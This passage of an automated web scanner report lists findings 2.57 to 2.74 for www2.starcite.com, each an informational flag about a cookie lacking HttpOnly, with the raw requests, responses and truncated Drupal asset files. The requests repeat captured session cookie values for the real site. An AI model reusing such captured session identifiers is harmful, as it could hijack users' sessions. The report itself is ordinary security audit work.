.tabs-nav-previous, .tabs-nav-next {
font-size: 12px;
font-weight: bold;
float: left;
b
...[SNIP]...

2.57. http://www2.starcite.com/starcite/modules/jstools/tabs/jquery.tabs.pack.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/jstools/tabs/jquery.tabs.pack.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/jstools/tabs/jquery.tabs.pack.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:16 GMT
Server: Apache
Last-Modified: Fri, 09 Feb 2007 15:45:00 GMT
ETag: "10000000027d4-128d-4290d0ad6b700"
Accept-Ranges: bytes
Content-Length: 4749
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:42 GMT;path=/

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e)
...[SNIP]...

2.58. http://www2.starcite.com/starcite/modules/jstools/tabs/tabs.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/jstools/tabs/tabs.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/jstools/tabs/tabs.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:06 GMT
Server: Apache
Last-Modified: Mon, 01 Jan 2007 09:08:00 GMT
ETag: "10000000027d6-77a-425f6f33ebc00"
Accept-Ranges: bytes
Content-Length: 1914
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:32 GMT;path=/

/*
IMPORTANT:
Essential styles to ensure accessibility
*/
@media projection, screen { /* use class for showing/hiding tab content, so that visibility can be better controlled in different media types.
...[SNIP]...

2.59. http://www2.starcite.com/starcite/modules/jstools/tabs/tabs.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/jstools/tabs/tabs.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/jstools/tabs/tabs.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:16 GMT
Server: Apache
Last-Modified: Sun, 30 Mar 2008 02:07:00 GMT
ETag: "10000000027d9-10da-4499dfd95f900"
Accept-Ranges: bytes
Content-Length: 4314
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:42 GMT;path=/

// $Id: tabs.js,v 1.2.2.9 2008/03/29 13:37:28 nedjo Exp $

Drupal.behaviors.tabs = function (context) {

// Process custom tabs.
$('.drupal-tabs:not(.tabs-processed)', context)
.addClass('tabs
...[SNIP]...

2.60. http://www2.starcite.com/starcite/modules/meetings2/meetings.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/meetings2/meetings.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/meetings2/meetings.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:13 GMT
Server: Apache
Last-Modified: Fri, 19 Sep 2008 19:40:00 GMT
ETag: "100000000290b-387-45744ddf42400"
Accept-Ranges: bytes
Content-Length: 903
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:39 GMT;path=/

function meetings2_form_validation(){
   var title    = document.getElementById('title').value;
   var description    = document.getElementById('description').value;
   var imageurl    = document.getElementById('
...[SNIP]...

2.61. http://www2.starcite.com/starcite/modules/meetings3/meetings.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/meetings3/meetings.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/meetings3/meetings.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:13 GMT
Server: Apache
Last-Modified: Fri, 19 Sep 2008 19:40:00 GMT
ETag: "1000000002910-387-45744ddf42400"
Accept-Ranges: bytes
Content-Length: 903
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:39 GMT;path=/

function meetings3_form_validation(){
   var title    = document.getElementById('title').value;
   var description    = document.getElementById('description').value;
   var imageurl    = document.getElementById('
...[SNIP]...

2.62. http://www2.starcite.com/starcite/modules/meetings4/meetings.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/meetings4/meetings.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/meetings4/meetings.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:13 GMT
Server: Apache
Last-Modified: Fri, 19 Sep 2008 19:40:00 GMT
ETag: "1000000002915-384-45744ddf42400"
Accept-Ranges: bytes
Content-Length: 900
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:39 GMT;path=/

function meetings4_form_validation(){
   var title    = document.getElementById('title').value;
   var description    = document.getElementById('description').value;
   var imageurl    = document.getElementById('
...[SNIP]...

2.63. http://www2.starcite.com/starcite/modules/meetingsmeetings.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/meetingsmeetings.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/meetingsmeetings.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 404 Not Found
Date: Sun, 02 Jan 2011 13:57:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 13:57:13 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:40 GMT;path=/
Content-Length: 11878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.64. http://www2.starcite.com/starcite/modules/node/node.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/node/node.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/node/node.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:09 GMT
Server: Apache
Last-Modified: Wed, 25 Jul 2007 07:08:00 GMT
ETag: "1000000002927-2a6-436112b8f5400"
Accept-Ranges: bytes
Content-Length: 678
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:34 GMT;path=/

/* $Id: node.css,v 1.2.2.1 2007/07/24 18:38:58 drumm Exp $ */

.node-unpublished {
background-color: #fff4f4;
}
.preview .node {
background-color: #ffffea;
}
#node-admin-filter ul {
list-style-t
...[SNIP]...

2.65. http://www2.starcite.com/starcite/modules/planners_howitworks/howitworks.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/planners_howitworks/howitworks.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/planners_howitworks/howitworks.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:13 GMT
Server: Apache
Last-Modified: Thu, 28 Aug 2008 17:38:00 GMT
ETag: "1000000002941-2cb-4558899238e00"
Accept-Ranges: bytes
Content-Length: 715
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:39 GMT;path=/

function planners_howitworks_form_validation(){
   var leftside_title    = document.getElementById('leftside_title').value;
   var middle_title    = document.getElementById('middle_title').value;
   var rights
...[SNIP]...

2.66. http://www2.starcite.com/starcite/modules/supplier_products/supplier_products.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/supplier_products/supplier_products.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/supplier_products/supplier_products.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:14 GMT
Server: Apache
Last-Modified: Fri, 29 Aug 2008 00:09:00 GMT
ETag: "1000000002966-2be-4558e0f76bf00"
Accept-Ranges: bytes
Content-Length: 702
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:40 GMT;path=/

function supplier_products_form_validation(){
   var title    = document.getElementById('title').value;
   var description    = document.getElementById('description').value;
   var imageurl    = document.getEleme
...[SNIP]...

2.67. http://www2.starcite.com/starcite/modules/system/defaults.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/system/defaults.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/system/defaults.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:09 GMT
Server: Apache
Last-Modified: Tue, 26 Aug 2008 04:23:00 GMT
ETag: "1000000002971-339-4555542509100"
Accept-Ranges: bytes
Content-Length: 825
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:35 GMT;path=/

/* $Id: defaults.css,v 1.2 2006/08/25 09:01:12 drumm Exp $ */

/*
** HTML elements
*/
fieldset {
margin-bottom: 1em;
padding: .5em;
}
form {
margin: 0;
padding: 0;
}
hr {
heigh
...[SNIP]...

2.68. http://www2.starcite.com/starcite/modules/system/system.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/system/system.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/system/system.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:09 GMT
Server: Apache
Last-Modified: Fri, 14 Nov 2008 05:48:34 GMT
ETag: "1000000002972-1afb-45b9fc7a13080"
Accept-Ranges: bytes
Content-Length: 6907
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:34 GMT;path=/

/* $Id: system.css,v 1.21 2006/12/21 16:13:06 dries Exp $ */

/*
** HTML elements
*/
th.active img {
display: inline;
}
tr.even, tr.odd {
background-color: #eee;
border-bottom: 1px solid #ccc;

...[SNIP]...

2.69. http://www2.starcite.com/starcite/modules/technology_overview/technology_overview.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/technology_overview/technology_overview.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/technology_overview/technology_overview.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:16 GMT
Server: Apache
Last-Modified: Fri, 03 Oct 2008 20:01:00 GMT
ETag: "100000000297f-f2-4585ecad57700"
Accept-Ranges: bytes
Content-Length: 242
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:42 GMT;path=/

function trim(str)
{
   return str.replace(/^\s*|\s*$/g,"");
}
function technology_overview_form_validation(){
   var title    = document.getElementById('title').value;
   if (trim(title)=="")
   {
       ale
...[SNIP]...

2.70. http://www2.starcite.com/starcite/modules/user/user.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/user/user.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/user/user.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:09 GMT
Server: Apache
Last-Modified: Sat, 30 Dec 2006 20:15:00 GMT
ETag: "1000000002b1b-35a-425d808f0b900"
Accept-Ranges: bytes
Content-Length: 858
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:35 GMT;path=/

/* $Id: user.css,v 1.4 2006/12/30 07:45:31 dries Exp $ */

#permissions td.module {
font-weight: bold;
}
#permissions td.permission {
padding-left: 1.5em;
}
#access-rules .access-type, #access-rul
...[SNIP]...

2.71. http://www2.starcite.com/starcite/morronijq.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/morronijq.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/morronijq.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:17 GMT
Server: Apache
Last-Modified: Tue, 09 Feb 2010 20:15:25 GMT
ETag: "5000000002dde-114bc-47f3093ff9140"
Accept-Ranges: bytes
Content-Length: 70844
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:43 GMT;path=/

/*!
* jQuery JavaScript Library v1.4.1
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...

2.72. http://www2.starcite.com/starcite/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/news

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/news HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:13:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:13:40 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=28
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:36:14 GMT;path=/
Content-Length: 23053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.73. http://www2.starcite.com/starcite/newsandevents  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/newsandevents

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/newsandevents HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:03 GMT;path=/
Content-Length: 41113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.74. http://www2.starcite.com/starcite/newsandevents/events/connecting-dots-whats-connection-between-technology-and-smmp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/newsandevents/events/connecting-dots-whats-connection-between-technology-and-smmp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/newsandevents/events/connecting-dots-whats-connection-between-technology-and-smmp HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
